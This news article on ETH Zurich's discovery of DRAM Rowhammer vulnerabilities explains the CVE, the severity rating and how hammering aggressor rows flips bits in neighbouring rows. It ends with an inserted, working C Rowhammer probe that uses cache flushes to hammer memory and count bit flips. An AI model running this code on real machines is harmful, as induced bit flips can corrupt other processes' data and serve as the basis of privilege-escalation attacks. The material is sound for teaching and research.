When browsing the internet on a laptop or writing messages on a smartphone, we all like to think that we are reasonably safe from hacker attacks as long as we have installed the latest software updates and anti-virus software. But what if the problem lies not with the software, but with the hardware? A team of researchers led by Kaveh Razavi at ETH Zurich, together with colleagues at the Vrije Universiteit Amsterdam and Qualcomm Technologies, has recently discovered fundamental vulnerabilities affecting DRAM, the main-memory component at the heart of all modern computer systems.
The results of their research have now been accepted for publication at a flagship IT security conference, and the Swiss National Cyber Security Centre (NCSC) has issued a Common Vulnerabilities and Exposures (CVE) number. This is the first time that a CVE identification has been issued by the NCSC in Switzerland (see box below). On a scale of 0 to 10, the severity of the vulnerability has been rated as 9.
The weakness of DRAM
“An underlying, well-known problem with DRAMs is called Rowhammer and has been known for several years”, Razavi explains. Rowhammer is an attack that exploits a fundamental weakness of modern DRAM. DRAM is short for Dynamic Random Access Memory, where “dynamic” means that the stored data is volatile and has to be refreshed constantly: the standard refresh interval is 64 milliseconds, so every row is rewritten more than ten times per second. This is because a DRAM chip uses only a single capacitor-transistor pair to store and access each bit of information.
The capacitors leak charge over time, and once they have leaked too much, the chip can no longer tell whether the stored bit was a “1” (which typically corresponds to a charged capacitor) or a “0” (a discharged one). On top of that, the bits are arranged in a grid of rows and columns, and every time a row is activated in order to be read or written, the currents that flow inside the chip cause the capacitors in the neighbouring rows to leak charge faster.
Problem not solved
“This is an unavoidable consequence of the constantly increasing density of electronic components on the DRAM chips”, says Patrick Jattke, a PhD student in Razavi’s group at the Department for Information Technology and Electrical Engineering. It means that by repeatedly activating – or “hammering” – a memory row (the “aggressor”), an attacker can induce bit errors in a neighbouring row, the “victim” row, without ever writing to it. Such a bit flip can then, in principle, be exploited to gain access to restricted areas of the computer system without relying on any software vulnerability: the flipped bit may sit in data the attacker could never write to directly, for example a page-table entry or a value that decides access rights.
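To make the aggressor/victim mechanism concrete, here is a minimal Rowhammer probe in the style of the public test programs that first demonstrated the effect. It is an added example and not code from the ETH Zurich researchers: it fills a buffer with a known pattern, repeatedly reads two aggressor addresses while flushing them from the CPU cache so that every read becomes a DRAM row activation, and then counts how many bits in the buffer no longer match the pattern. The choice of aggressor pages (first and last page of the buffer), the page size and the iteration counts are assumptions made for illustration; a real attack first recovers the mapping from physical addresses to DRAM banks and rows so that the two aggressors are known to share a bank. On a machine with ECC or effective Rowhammer mitigations, or inside a virtual machine, the expected result is zero flips. Do not run it on a production host: any flips it does induce land in rows that may belong to other processes.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if defined(__SSE2__)
#include <emmintrin.h>
/* Evict the cache line holding p from all cache levels, so that the next
 * read of p has to go to DRAM and therefore activates the row. */
static void flush_line(const volatile void *p)
{
    _mm_clflush((const void *)(uintptr_t)p);
}
#else
/* Assumption: no portable cache flush on other ISAs in this example. The
 * loop then hits the cache instead of DRAM and no flips are expected. */
static void flush_line(const volatile void *p) { (void)p; }
#endif

#define PAGE_SIZE 4096u

/* Repeatedly read two aggressor addresses. Flushing after each read turns
 * every iteration into a fresh row activation; two addresses in different
 * rows of the same bank force the row buffer to be opened and closed each
 * time, which is the "hammering" the article describes. */
static void hammer(volatile uint8_t *agg1, volatile uint8_t *agg2,
                   unsigned long iterations)
{
    for (unsigned long i = 0; i < iterations; i++) {
        (void)*agg1;
        (void)*agg2;
        flush_line(agg1);
        flush_line(agg2);
    }
}

/* Count the bits in buf that no longer match the fill pattern. */
size_t count_bit_flips(const uint8_t *buf, size_t len, uint8_t pattern)
{
    size_t flips = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = (uint8_t)(buf[i] ^ pattern);
        while (diff) {
            flips += diff & 1u;
            diff >>= 1;
        }
    }
    return flips;
}

/* Fill a page-aligned buffer, hammer two aggressor pages in it, then report
 * how many bits anywhere in the buffer flipped. Returns (size_t)-1 if the
 * allocation fails. */
size_t rowhammer_probe(size_t bytes, unsigned long iterations, uint8_t pattern)
{
    bytes = (bytes + PAGE_SIZE - 1) / PAGE_SIZE * PAGE_SIZE;
    if (bytes < 4 * PAGE_SIZE)
        bytes = 4 * PAGE_SIZE;
    uint8_t *buf = aligned_alloc(PAGE_SIZE, bytes);
    if (buf == NULL)
        return (size_t)-1;
    memset(buf, pattern, bytes);   /* also faults the pages in */

    /* Assumption: the first and last page of the buffer are the aggressors.
     * Without the physical-address-to-bank/row mapping there is no guarantee
     * that they share a bank; a real attack recovers that mapping first. */
    hammer(buf, buf + bytes - PAGE_SIZE, iterations);

    size_t flips = count_bit_flips(buf, bytes, pattern);
    free(buf);
    return flips;
}

int main(void)
{
    /* 64 MiB buffer, five million activations per aggressor. */
    size_t flips = rowhammer_probe(64u << 20, 5000000UL, 0xFF);
    if (flips == (size_t)-1) {
        fprintf(stderr, "allocation failed\n");
        return 1;
    }
    printf("bit flips observed: %zu\n", flips);
    return 0;
}
```

The flush after every read is the essential ingredient: without it the second and all later reads of an aggressor are served from the CPU cache, the DRAM row is never re-activated, and nothing is hammered. Production test tools extend this loop by iterating over many aggressor pairs, trying several fill patterns (all ones, all zeros, alternating), and mapping any flipped address back to the physical row it lives in.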